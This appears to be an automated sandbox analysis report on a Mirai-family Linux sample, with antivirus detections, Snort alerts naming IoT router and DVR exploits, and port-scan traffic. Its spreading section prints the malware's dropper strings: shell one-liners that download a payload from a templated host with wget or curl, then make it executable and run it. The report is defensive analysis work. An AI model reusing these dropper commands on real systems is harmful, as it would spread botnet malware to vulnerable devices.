Analysis Report MGuvcs6Ocz

AV Detection:

Antivirus / Scanner detection for submitted sample

Source: MGuvcs6Ocz

Avira: detected

Antivirus detection for dropped file

Source: /usr/networks

Avira: detection malicious, Label: LINUX/Mirai.lldau

Multi AV Scanner detection for submitted file

Source: MGuvcs6Ocz	Virustotal: Detection: 68%			Perma Link
Source: MGuvcs6Ocz	Metadefender: Detection: 51%			Perma Link
Source: MGuvcs6Ocz	ReversingLabs: Detection: 68%

Spreading:

Found strings indicative of a multi-platform dropper

Source: MGuvcs6Ocz	String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: MGuvcs6Ocz	String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: MGuvcs6Ocz	String: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'

Opens /proc/net/* files useful for finding connected devices and routers

Source: /tmp/MGuvcs6Ocz (PID: 4622)	Opens: /proc/net/route			Jump to behavior
Source: /tmp/MGuvcs6Ocz (PID: 4622)	Opens: /proc/net/route			Jump to behavior

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 188.1.231.30: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.234.3.129: -> 192.168.2.20:
Source: Traffic	Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 172.255.155.208: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 94.220.101.122: -> 192.168.2.20:
Source: Traffic	Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 154.81.29.141: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:56650 -> 3.22.215.251:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:56650 -> 3.22.215.251:80
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.175.72.92:8000 -> 192.168.2.20:7723
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 103.91.245.19:5214 -> 192.168.2.20:7723
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 89.56.30.160: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 125.227.149.119:24319 -> 192.168.2.20:7723
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:46712 -> 104.85.180.168:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:46712 -> 104.85.180.168:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.85.180.168:80 -> 192.168.2.20:46712
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 121.132.251.243:6881 -> 192.168.2.20:7723
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 59.99.46.89:4000 -> 192.168.2.20:7723
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 117.192.224.209:1027 -> 192.168.2.20:7723
Source: Traffic	Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 104.218.87.244: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:52888 -> 109.67.247.125:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:52888 -> 109.67.247.125:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:51496 -> 13.226.101.83:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:41804 -> 99.192.234.217:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:51496 -> 13.226.101.83:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:41804 -> 99.192.234.217:80
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.199.60.36: -> 192.168.2.20:
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 31.22.82.187: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 38.122.22.118: -> 192.168.2.20:
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 45.169.165.229: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:45344 -> 61.213.102.33:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:45344 -> 61.213.102.33:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:49960 -> 154.201.250.66:80
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 202.164.139.206:2547 -> 192.168.2.20:7723
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.175.72.85:10481 -> 192.168.2.20:7723
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.175.58.178:55184 -> 192.168.2.20:7723
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 50.242.148.249: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.175.113.174:8081 -> 192.168.2.20:7723
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:43006 -> 185.29.123.11:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:56722 -> 164.132.9.223:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:56722 -> 164.132.9.223:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:43006 -> 185.29.123.11:80
Source: Traffic	Snort IDS: 2025884 ET EXPLOIT Multiple CCTV-DVR Vendors RCE 192.168.2.20:47166 -> 121.127.241.108:81
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 124.75.149.185: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 95.248.151.214: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.73.215.131: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 172.101.203.193: -> 192.168.2.20:
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 103.105.215.18: -> 192.168.2.20:
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 81.228.85.109: -> 192.168.2.20:
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 91.190.192.194: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:50256 -> 217.182.243.67:80
Source: Traffic	Snort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.20:42672 -> 146.184.165.4:5555
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:44594 -> 170.246.231.239:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:44594 -> 170.246.231.239:80
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 149.11.89.129: -> 192.168.2.20:
Source: Traffic	Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 154.85.133.197: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.91.195.37: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:56750 -> 50.66.70.68:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:56750 -> 50.66.70.68:80
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.226.148.46: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 113.131.128.13: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2025884 ET EXPLOIT Multiple CCTV-DVR Vendors RCE 192.168.2.20:56268 -> 115.87.204.89:81
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 81.228.84.85: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:35814 -> 35.244.243.215:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:41946 -> 45.65.120.55:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:33440 -> 23.207.67.88:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:33440 -> 23.207.67.88:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.207.67.88:80 -> 192.168.2.20:33440
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:43164 -> 146.158.12.4:80
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:36034 -> 23.217.112.105:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:36034 -> 23.217.112.105:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.217.112.105:80 -> 192.168.2.20:36034
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:49646 -> 175.234.128.97:8080
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:49646 -> 175.234.128.97:8080
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:50886 -> 44.239.233.229:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:50886 -> 44.239.233.229:80
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 81.21.200.33: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:41622 -> 13.126.136.27:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:41622 -> 13.126.136.27:80
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.208.169.116: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 24.89.194.122: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:40490 -> 23.76.236.93:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:40490 -> 23.76.236.93:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.76.236.93:80 -> 192.168.2.20:40490
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 82.135.69.230: -> 192.168.2.20:
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 84.17.32.179: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 188.126.172.52: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 77.9.65.166: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.97.108.253: -> 192.168.2.20:
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 190.5.88.118: -> 192.168.2.20:
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 67.204.13.138: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 81.173.167.44: -> 192.168.2.20:
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 212.156.201.116: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.144.72.42: -> 192.168.2.20:
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 188.105.63.155: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:39386 -> 178.79.174.158:80
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:39386 -> 178.79.174.158:80
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 95.33.211.220: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 120.193.91.233:27697 -> 192.168.2.20:7723
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.175.94.73:8082 -> 192.168.2.20:7723
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 50.220.200.185: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:39138 -> 79.171.18.106:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:39138 -> 79.171.18.106:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:41018 -> 166.88.243.237:80
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:38600 -> 51.83.246.144:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:38600 -> 51.83.246.144:80
Source: Traffic	Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 116.68.110.157:17793 -> 192.168.2.20:7723
Source: Traffic	Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:43474 -> 166.88.120.253:8080
Source: Traffic	Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:43474 -> 166.88.120.253:8080
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 166.88.120.253:8080 -> 192.168.2.20:43474
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.23.252.43: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:40592 -> 95.8.122.63:8080
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:40592 -> 95.8.122.63:8080
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:45922 -> 104.80.82.152:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:45922 -> 104.80.82.152:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.80.82.152:80 -> 192.168.2.20:45922
Source: Traffic	Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 149.104.34.37: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:36852 -> 157.65.87.141:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:36852 -> 157.65.87.141:80
Source: Traffic	Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 128.233.16.2: -> 192.168.2.20:
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.40.37.31:80 -> 192.168.2.20:40260
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.57.107.2: -> 192.168.2.20:
Source: Traffic	Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 153.126.135.194: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:60106 -> 154.90.79.101:80
Source: Traffic	Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:60106 -> 154.90.79.101:80
Source: Traffic	Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 178.8.127.178: -> 192.168.2.20:
Source: Traffic	Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:42134 -> 23.34.199.82:80
Source: Traffic	Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:42134 -> 23.34.199.82:80
Source: Traffic	Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.34.199.82:80 -> 192.168.2.20:42134
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:43048 -> 133.137.248.191:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:40260 -> 23.40.37.31:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:35178 -> 18.228.54.139:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:60998 -> 81.7.8.12:80
Source: Traffic	Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:51938 -> 157.245.223.131:80
Source: Traffic	Snort IDS: 2024915 ET EXPLOIT Possible Vacron NVR Remote Command Execution 192.168.2.20:44880 -> 183.114.91.82:8080

Connects to many ports of the same IP (likely port scanning)

Source: global traffic	TCP traffic: 209.91.20.132 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 179.37.139.184 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 27.20.114.90 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 120.161.181.26 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 16.197.247.12 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 109.31.128.69 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 71.181.75.105 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 4.119.113.119 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 71.163.189.157 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 202.214.128.209 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 99.183.96.40 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 118.206.103.100 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 180.190.249.44 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 175.46.210.102 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 6.86.153.110 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 131.228.7.91 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 111.205.48.104 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 197.124.118.3 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 23.6.254.240 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 94.185.176.145 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 155.201.44.186 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 114.207.0.228 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 87.83.202.29 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 76.213.165.145 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 211.90.22.130 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 114.154.250.15 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 203.160.221.66 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 163.90.78.111 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 189.165.80.3 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 57.163.20.143 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 61.193.135.39 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 128.42.237.138 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 218.182.128.219 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 115.221.72.54 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 67.93.178.237 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 38.139.125.205 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 3.106.131.99 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 27.17.171.210 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 15.51.212.241 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 218.152.25.33 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 96.0.134.167 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 22.30.91.157 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 139.93.154.170 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 164.142.55.184 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 108.113.55.135 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 154.190.122.88 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 71.11.190.90 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 84.48.141.104 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 151.169.69.96 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 159.212.6.68 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 116.221.170.83 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 6.60.84.48 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 178.123.18.214 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 26.80.202.172 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 49.41.213.146 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 2.216.247.11 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 89.179.8.221 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 68.179.189.189 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 94.105.143.222 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 219.143.155.172 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 168.27.245.114 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 191.199.26.110 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 203.63.207.193 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 150.37.72.24 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 25.84.54.191 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 139.49.163.59 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 184.49.220.2 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 131.164.56.28 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 94.18.108.108 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 120.239.0.46 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 36.54.249.217 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 165.16.122.1 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 73.150.235.205 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 2.185.196.129 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 194.203.125.103 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 114.83.134.162 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 57.164.19.75 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 143.157.186.149 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 168.216.111.161 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 130.140.7.168 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 29.161.161.202 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 40.138.247.89 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 80.219.251.133 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 82.109.64.3 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 14.9.89.162 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 220.179.82.16 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 73.2.23.66 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 107.126.27.122 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 75.82.66.140 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 82.6.17.28 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 211.64.237.240 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 114.238.112.196 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 36.184.218.26 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 100.16.3.210 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 123.138.120.67 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 134.67.11.73 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 50.70.173.82 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 193.118.213.59 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 103.148.212.55 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 213.150.115.196 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 165.66.227.31 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 2.96.223.8 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 42.240.2.232 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 104.178.119.156 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 70.132.111.66 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 200.109.140.124 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 31.127.22.163 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 50.192.24.84 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 33.128.39.87 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 184.235.140.0 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 63.119.139.18 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 35.205.25.55 ports 2,5,6,8,9,52869
